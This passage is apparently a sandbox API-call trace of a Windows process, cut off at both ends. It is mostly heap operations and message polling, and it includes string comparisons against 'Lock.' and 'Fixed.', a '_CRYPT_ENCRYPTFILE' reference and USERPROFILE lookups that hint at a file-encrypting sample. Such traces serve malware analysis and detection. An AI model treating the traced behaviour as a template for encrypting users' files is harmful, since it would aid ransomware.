(lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\NRdQ.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\nrdq.m4a")) returned 0xffffffff [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0235.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0235.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.622] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0235.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0235.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P22ObdW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="22ObdW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2ObdW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ObdW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bdW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dW9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DNX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NX.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0235.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0235.624] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0235.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0235.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0235.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0235.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0235.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0235.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P22ObdW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0235.624] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="22ObdW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2ObdW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ObdW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bdW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dW9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="W9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DNX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0235.625] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NX.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0235.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0235.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505d8 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50560 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50548 | out: hHeap=0x970000) returned 1 [0235.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0235.626] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0235.626] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0235.626] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.626] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0235.626] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e58910 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0235.627] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0235.627] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x2e564e0 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0235.627] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50548 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0235.628] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0235.628] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50488 [0235.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0235.630] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0235.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa30 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0235.632] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9b8 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0235.632] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0235.633] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f9e0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7faa8 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0235.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0235.633] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa08 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503e0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8c8 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0235.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f990 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0235.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0235.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0235.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0235.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.635] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0235.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506b0 | out: hHeap=0x970000) returned 1 [0235.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0235.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, 